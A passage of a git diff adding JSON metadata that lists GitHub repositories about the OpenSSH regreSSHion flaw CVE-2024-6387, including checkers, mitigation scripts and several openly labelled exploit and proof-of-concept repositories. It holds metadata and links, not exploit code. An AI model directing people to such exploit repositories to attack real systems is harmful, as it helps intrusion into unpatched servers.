"invaderslabs", + "id": 149894888, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149894888?v=4", + "html_url": "https:\/\/github.com\/invaderslabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/invaderslabs\/regreSSHion-CVE-2024-6387-", + "description": "Provides instructions for using the script to check if your OpenSSH installation is vulnerable to CVE-2024-6387", + "fork": false, + "created_at": "2024-07-04T13:15:54Z", + "updated_at": "2024-07-04T22:22:18Z", + "pushed_at": "2024-07-04T22:22:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824156825, + "name": "CVE-2024-6387", + "full_name": "lala-amber\/CVE-2024-6387", + "owner": { + "login": "lala-amber", + "id": 72958716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72958716?v=4", + "html_url": "https:\/\/github.com\/lala-amber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lala-amber\/CVE-2024-6387", + "description": null, + "fork": false, + "created_at": "2024-07-04T13:28:53Z", + "updated_at": "2024-10-07T12:21:51Z", + "pushed_at": "2024-07-04T13:35:57Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824185491, + "name": "regreSSHive", + "full_name": "4lxprime\/regreSSHive", + "owner": { + "login": "4lxprime", + "id": 58915711, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58915711?v=4", + "html_url": "https:\/\/github.com\/4lxprime", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/4lxprime\/regreSSHive", + "description": "rewrited SSH Exploit for CVE-2024-6387 (regreSSHion)", + "fork": false, + "created_at": "2024-07-04T14:34:21Z", + "updated_at": "2024-07-04T15:27:03Z", + "pushed_at": "2024-07-04T14:34:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "6387", + "c", + "cve", + "cve-2024-6387", + "exploit", + "poc", + "regresshion", + "ssh", + "sshd" + ], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824318880, + "name": "CVE-2024-6387_Check", + "full_name": "sardine-web\/CVE-2024-6387_Check", + "owner": { + "login": "sardine-web", + "id": 80635620, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80635620?v=4", + "html_url": "https:\/\/github.com\/sardine-web", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sardine-web\/CVE-2024-6387_Check", + "description": "A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead to sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.", + "fork": false, + "created_at": "2024-07-04T21:20:26Z", + "updated_at": "2024-07-05T10:10:03Z", + "pushed_at": "2024-07-04T21:31:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824382817, + "name": "cve-2024-6387_hassh", + "full_name": "0x4D31\/cve-2024-6387_hassh", + "owner": { + "login": "0x4D31", + "id": 11577776, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11577776?v=4", + "html_url": "https:\/\/github.com\/0x4D31", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x4D31\/cve-2024-6387_hassh", + "description": "HASSH fingerprints for identifying OpenSSH servers potentially vulnerable to CVE-2024-6387 (regreSSHion).", + "fork": false, + "created_at": "2024-07-05T02:46:57Z", + "updated_at": "2024-09-27T09:29:35Z", + "pushed_at": "2024-07-05T03:40:53Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-6387", + "fingerprint", + "hassh", + "regresshion", + "ssh" + ], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824544385, + "name": "CVE-2024-6387-template", + "full_name": "sardine-web\/CVE-2024-6387-template", + "owner": { + "login": "sardine-web", + "id": 80635620, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80635620?v=4", + "html_url": "https:\/\/github.com\/sardine-web", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sardine-web\/CVE-2024-6387-template", + "description": "Quick regreSSHion checker (based on software version) for nuclei CVE-2024-6387", + "fork": false, + "created_at": "2024-07-05T11:05:26Z", + "updated_at": "2024-07-06T17:26:24Z", + "pushed_at": "2024-07-06T17:26:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824549009, + "name": "CVE-2024-6387", + "full_name": "imv7\/CVE-2024-6387", + "owner": { + "login": "imv7", + "id": 13357603, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13357603?v=4", + "html_url": "https:\/\/github.com\/imv7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/imv7\/CVE-2024-6387", + "description": null, + "fork": false, + "created_at": "2024-07-05T11:18:38Z", + "updated_at": "2024-07-05T11:19:24Z", + "pushed_at": "2024-07-05T11:19:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824639761, + "name": "CVE-2024-6387-Finder", + "full_name": "SiberianHacker\/CVE-2024-6387-Finder", + "owner": { + "login": "SiberianHacker", + "id": 115571334, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115571334?v=4", + "html_url": "https:\/\/github.com\/SiberianHacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SiberianHacker\/CVE-2024-6387-Finder", + "description": "CVE-2024-6387 SSH finder", + "fork": false, + "created_at": "2024-07-05T15:15:41Z", + "updated_at": "2024-07-05T15:22:29Z", + "pushed_at": "2024-07-05T15:22:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824676344, + "name": "patch_regreSSHion", + "full_name": "dgicloud\/patch_regreSSHion", + "owner": { + "login": "dgicloud", + "id": 85541525, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85541525?v=4", + "html_url": "https:\/\/github.com\/dgicloud", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dgicloud\/patch_regreSSHion", + "description": "Correção e Atualização do OpenSSH para CVE-2024-6387", + "fork": false, + "created_at": "2024-07-05T16:59:19Z", + "updated_at": "2024-07-05T16:59:55Z", + "pushed_at": "2024-07-05T16:59:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824752906, + "name": "CVE-2024-6387-how-to-fix", + "full_name": "azurejoga\/CVE-2024-6387-how-to-fix", + "owner": { + "login": "azurejoga", + "id": 91762249, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91762249?v=4", + "html_url": "https:\/\/github.com\/azurejoga", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/azurejoga\/CVE-2024-6387-how-to-fix", + "description": "Vulnerability remediation and mitigationCVE-2024-6387", + "fork": false, + "created_at": "2024-07-05T21:29:11Z", + "updated_at": "2024-08-12T14:40:39Z", + "pushed_at": "2024-07-05T21:47:44Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 825724862, + "name": "CVE-2024-6387", + "full_name": "asterictnl-lvdw\/CVE-2024-6387", + "owner": { + "login": "asterictnl-lvdw", + "id": 99249102, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99249102?v=4", + "html_url": "https:\/\/github.com\/asterictnl-lvdw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asterictnl-lvdw\/CVE-2024-6387", + "description": "Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (CVE-2024-6387)", + "fork": false, + "created_at": "2024-07-08T11:27:49Z", + "updated_at": "2024-11-28T08:38:30Z", + "pushed_at": "2024-08-22T08:50:25Z", + "stargazers_count": 49, + "watchers_count": 49, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 49, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 825734560, + "name": "regreSSHion", + "full_name": "vkaushik-chef\/regreSSHion", + "owner": { + "login": "vkaushik-chef", + "id": 91254377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91254377?v=4", + "html_url": "https:\/\/github.com\/vkaushik-chef", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vkaushik-chef\/regreSSHion", + "description": "Chef Inspec profile for checking regreSSHion vulnerability CVE-2024-6387", + "fork": false, + "created_at": "2024-07-08T11:48:15Z", + "updated_at": "2024-07-08T12:04:36Z", + "pushed_at": "2024-07-08T12:04:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 826287983, + "name": "mitigate-CVE-2024-6387", + "full_name": "dgourillon\/mitigate-CVE-2024-6387", + "owner": { + "login": "dgourillon", + "id": 50948886, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50948886?v=4", + "html_url": "https:\/\/github.com\/dgourillon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dgourillon\/mitigate-CVE-2024-6387", + "description": null, + "fork": false, + "created_at": "2024-07-09T12:16:44Z", + "updated_at": "2024-07-09T16:03:07Z", + "pushed_at": "2024-07-09T16:03:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 826336009, + "name": "CVE-2024-6387", + "full_name": "mrmtwoj\/CVE-2024-6387", + "owner": { + "login": "mrmtwoj", + "id": 22832463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22832463?v=4", + "html_url": "https:\/\/github.com\/mrmtwoj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mrmtwoj\/CVE-2024-6387", + "description": "regreSSHion is a security tool designed to test for vulnerabilities related to CVE-2024-6387, specifically focusing on SSH and remote access exploitation. ", + "fork": false, + "created_at": "2024-07-09T14:06:02Z", + "updated_at": "2024-10-07T04:02:49Z", + "pushed_at": "2024-07-09T14:29:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-6387", + "cve-2024-6387-checker", + "openssh", + "openssh-key", + "poc", + "regresshion-cve-2024-6387-ssh-security" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 826432240, + "name": "CVE-2024-6387-Vulnerability-Checker", + "full_name": "filipi86\/CVE-2024-6387-Vulnerability-Checker", + "owner": { + "login": "filipi86", + "id": 31785433, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31785433?v=4", + "html_url": "https:\/\/github.com\/filipi86", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/filipi86\/CVE-2024-6387-Vulnerability-Checker", + "description": "This Python script checks for the CVE-2024-6387 vulnerability in OpenSSH servers. It supports multiple IP addresses, URLs, CIDR ranges, and ports. The script can also read addresses from a file.", + "fork": false, + "created_at": "2024-07-09T17:40:19Z", + "updated_at": "2024-10-23T02:21:38Z", + "pushed_at": "2024-07-10T15:24:08Z", + "stargazers_count": 92, + "watchers_count": 92, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 92, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 826508816, + "name": "CVE-2024-6387-Vulnerability-Checker", + "full_name": "kubota\/CVE-2024-6387-Vulnerability-Checker", + "owner": { + "login": "kubota", + "id": 119277, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119277?v=4", + "html_url": "https:\/\/github.com\/kubota", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kubota\/CVE-2024-6387-Vulnerability-Checker", + "description": "This Rust Code is designed to check SSH servers for the CVE-2024-6387 vulnerability", + "fork": false, + "created_at": "2024-07-09T21:01:15Z", + "updated_at": "2024-07-11T05:46:45Z", + "pushed_at": "2024-07-09T21:08:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 826836993, + "name": "cve-2024-6387-poc", + "full_name": "DimaMend\/cve-2024-6387-poc", + "owner": { + "login": "DimaMend", + "id": 145161091, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145161091?v=4", + "html_url": "https:\/\/github.com\/DimaMend", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DimaMend\/cve-2024-6387-poc", + "description": null, + "fork": false, + "created_at": "2024-07-10T13:27:23Z", + "updated_at": "2024-07-10T13:33:54Z", + "pushed_at": "2024-07-10T13:33:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 827378414, + "name": "CVE-2024-6387", + "full_name": "ThemeHackers\/CVE-2024-6387", + "owner": { + "login": "ThemeHackers", + "id": 107047730, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107047730?v=4", + "html_url": "https:\/\/github.com\/ThemeHackers", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThemeHackers\/CVE-2024-6387", + "description": "CVE-2024-6387, also known as RegreSSHion, is a high-severity vulnerability found in OpenSSH servers (sshd) running on glibc-based Linux systems. It is a regression of a previously fixed vulnerability (CVE-2006-5051), which means the issue was reintroduced in newer versions of OpenSSH.", + "fork": false, + "created_at": "2024-07-11T14:37:17Z", + "updated_at": "2024-07-30T14:09:30Z", + "pushed_at": "2024-07-11T14:59:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 827444140, + "name": "mitigate_ssh", + "full_name": "Sibijo\/mitigate_ssh", + "owner": { + "login": "Sibijo", + "id": 148327357, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148327357?v=4", + "html_url": "https:\/\/github.com\/Sibijo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sibijo\/mitigate_ssh", + "description": " OpenSSH vulnerability CVE-2024-6387", + "fork": false, + "created_at": "2024-07-11T16:54:41Z", + "updated_at": "2024-07-29T17:48:05Z", + "pushed_at": "2024-07-11T16:55:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 827570389, + "name": "regreSSHion-Fix", + "full_name": "Passyed\/regreSSHion-Fix", + "owner": { + "login": "Passyed", + "id": 102136066, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102136066?v=4", + "html_url": "https:\/\/github.com\/Passyed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Passyed\/regreSSHion-Fix", + "description": "Fix for regreSSHion CVE-2024-6387 for Ubuntu and Debian", + "fork": false, + "created_at": "2024-07-11T23:22:14Z", + "updated_at": "2024-07-12T00:07:02Z", + "pushed_at": "2024-07-12T00:06:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 828627988, + "name": "CVE-2024-6387", + "full_name": "dream434\/CVE-2024-6387", + "owner": { + "login": "dream434", + "id": 114837630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114837630?v=4", + "html_url": "https:\/\/github.com\/dream434", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dream434\/CVE-2024-6387", + "description": " OpenSSH a publié un avis de sécurité concernant la vulnérabilité critique CVE-2024-6387. Cette vulnérabilité permet à un attaquant non authentifié d'exécuter du code arbitraire", + "fork": false, + "created_at": "2024-07-14T18:00:49Z", + "updated_at": "2024-07-14T18:05:22Z", + "pushed_at": "2024-07-14T18:02:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 829031934, + "name": "CVE-2024-6387", + "full_name": "ThatNotEasy\/CVE-2024-6387", + "owner": { + "login": "ThatNotEasy", + "id": 25004320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4", + "html_url": "https:\/\/github.com\/ThatNotEasy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2024-6387", + "description": "OpenSSH RCE Massive Vulnerable Scanner", + "fork": false, + "created_at": "2024-07-15T16:04:57Z", + "updated_at": "2024-10-30T04:42:06Z", + "pushed_at": "2024-07-15T16:06:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 833415966, + "name": "CVE-2024-6387", + "full_name": "prelearn-code\/CVE-2024-6387", + "owner": { + "login": "prelearn-code", + "id": 175189722, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/175189722?v=4", + "html_url": "https:\/\/github.com\/prelearn-code", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/prelearn-code\/CVE-2024-6387", + "description": null, + "fork": false, + "created_at": "2024-07-25T02:32:19Z", + "updated_at": "2024-08-06T14:08:36Z", + "pushed_at": "2024-07-25T02:37:55Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 835582804, + "name": "CVE-2024-6387", + "full_name": "l-urk\/CVE-2024-6387", + "owner": { + "login": "l-urk", + "id": 112792604, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112792604?v=4", + "html_url": "https:\/\/github.com\/l-urk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l-urk\/CVE-2024-6387", + "description": "Proof of concept python script for regreSSHion exploit. ", + "fork": false, + "created_at": "2024-07-30T06:13:11Z", + "updated_at": "2024-11-20T12:28:26Z", + "pushed_at": "2024-10-19T04:58:22Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": true, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 836283983, + "name": "ssh_poc2024", + "full_name": "alex14324\/ssh_poc2024", + "owner": { + "login": "alex14324", + "id": 36421715, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36421715?v=4", + "html_url": "https:\/\/github.com\/alex14324", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alex14324\/ssh_poc2024", + "description": "An exploit for CVE-2024-6387, targeting a signal handler race condition in OpenSSH's server ", + "fork": false, + "created_at": "2024-07-31T14:19:19Z", + "updated_at": "2024-07-31T14:20:46Z", + "pushed_at": "2024-07-31T14:19:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 838725789, + "name": "CVE-2023-4596-OpenSSH-Multi-Checker", + "full_name": "X-Projetion\/CVE-2023-4596-OpenSSH-Multi-Checker", + "owner": { + "login": "X-Projetion", + "id": 161194427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161194427?v=4", + "html_url": "https:\/\/github.com\/X-Projetion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X-Projetion\/CVE-2023-4596-OpenSSH-Multi-Checker", + "description": "CVE-2024-6387-checker is a tool or script designed to detect the security vulnerability known as CVE-2024-6387 OpenSSH. CVE-2024-6387 OpenSSH is an entry in the Common Vulnerabilities and Exposures (CVE) that documents security weaknesses discovered in certain software or systems.", + "fork": false, + "created_at": "2024-08-06T08:12:48Z", + "updated_at": "2024-08-10T11:17:27Z", + "pushed_at": "2024-08-06T08:27:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844630300, + "name": "CVE-2024-6387-Race-Condition-in-Signal-Handling-for-OpenSSH", + "full_name": "s1d6point7bugcrowd\/CVE-2024-6387-Race-Condition-in-Signal-Handling-for-OpenSSH", + "owner": { + "login": "s1d6point7bugcrowd", + "id": 163605035, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163605035?v=4", + "html_url": "https:\/\/github.com\/s1d6point7bugcrowd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s1d6point7bugcrowd\/CVE-2024-6387-Race-Condition-in-Signal-Handling-for-OpenSSH", + "description": null, + "fork": false, + "created_at": "2024-08-19T16:45:53Z", + "updated_at": "2024-08-19T16:47:17Z", + "pushed_at": "2024-08-19T16:47:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844959580, + "name": "OpenSSH-CVE-2024-6387-Fix", + "full_name": "almogopp\/OpenSSH-CVE-2024-6387-Fix", + "owner": { + "login": "almogopp", + "id": 37026702, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37026702?v=4", + "html_url": "https:\/\/github.com\/almogopp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/almogopp\/OpenSSH-CVE-2024-6387-Fix", + "description": "A Bash script to mitigate the CVE-2024-6387 vulnerability in OpenSSH by providing an option to upgrade to a secure version or apply a temporary workaround. This repository helps secure systems against potential remote code execution risks associated with affected OpenSSH versions.", + "fork": false, + "created_at": "2024-08-20T09:57:24Z", + "updated_at": "2024-08-20T09:58:35Z", + "pushed_at": "2024-08-20T09:58:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 847548583, + "name": "CVE-2024-6387_Check", + "full_name": "HadesNull123\/CVE-2024-6387_Check", + "owner": { + "login": "HadesNull123", + "id": 56301165, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56301165?v=4", + "html_url": "https:\/\/github.com\/HadesNull123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HadesNull123\/CVE-2024-6387_Check", + "description": "RCE OpenSSH CVE-2024-6387 Check and Exploit", + "fork": false, + "created_at": "2024-08-26T04:40:27Z", + "updated_at": "2024-08-26T04:41:05Z", + "pushed_at": "2024-08-26T04:41:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848825194, + "name": "CVE-2024-6387-Vulnerability-Checker", + "full_name": "identity-threat-labs\/CVE-2024-6387-Vulnerability-Checker", + "owner": { + "login": "identity-threat-labs", + "id": 179711116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179711116?v=4", + "html_url": "https:\/\/github.com\/identity-threat-labs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/identity-threat-labs\/CVE-2024-6387-Vulnerability-Checker", + "description": "This Python script checks for the CVE-2024-6387 vulnerability in OpenSSH servers. It supports multiple IP addresses, URLs, CIDR ranges, and ports. The script can also read addresses from a file.", + "fork": false, + "created_at": "2024-08-28T13:28:08Z", + "updated_at": "2024-10-31T05:34:32Z", + "pushed_at": "2024-08-29T14:52:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 849418620, + "name": "Article-RegreSSHion-CVE-2024-6387", + "full_name": "identity-threat-labs\/Article-RegreSSHion-CVE-2024-6387", + "owner": { + "login": "identity-threat-labs", + "id": 179711116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179711116?v=4", + "html_url": "https:\/\/github.com\/identity-threat-labs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/identity-threat-labs\/Article-RegreSSHion-CVE-2024-6387", + "description": "In an era where digital security is crucial, a new vulnerability in OpenSSH, identified as CVE-2024-6387, has drawn the attention of system administrators and security professionals worldwide. Named \"regreSSHion,\" this severe security flaw allows remote code execution (RCE) and could significant threat to the integrity of vulnerable systems.", + "fork": false, + "created_at": "2024-08-29T15:00:56Z", + "updated_at": "2024-09-04T16:27:20Z", + "pushed_at": "2024-08-29T15:06:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 893527608, + "name": "CVE-2024-6387", + "full_name": "YassDEV221608\/CVE-2024-6387", + "owner": { + "login": "YassDEV221608", + "id": 145906163, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145906163?v=4", + "html_url": "https:\/\/github.com\/YassDEV221608", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YassDEV221608\/CVE-2024-6387", + "description": null, + "fork": false, + "created_at": "2024-11-24T17:12:26Z", + "updated_at": "2024-11-24T17:14:33Z", + "pushed_at": "2024-11-24T17:14:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6473.json b/2024/CVE-2024-6473.json new file mode 100644 index 0000000000..c8708f0e72 --- /dev/null +++ b/2024/CVE-2024-6473.json @@ -0,0 +1,40 @@ +[ + { + "id": 882188373, + "name": "CVE-2024-6473-PoC", + "full_name": "12345qwert123456\/CVE-2024-6473-PoC", + "owner": { + "login": "12345qwert123456", + "id": 63474188, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63474188?v=4", + "html_url": "https:\/\/github.com\/12345qwert123456", + "user_view_type": "public" + }, + "html_url": 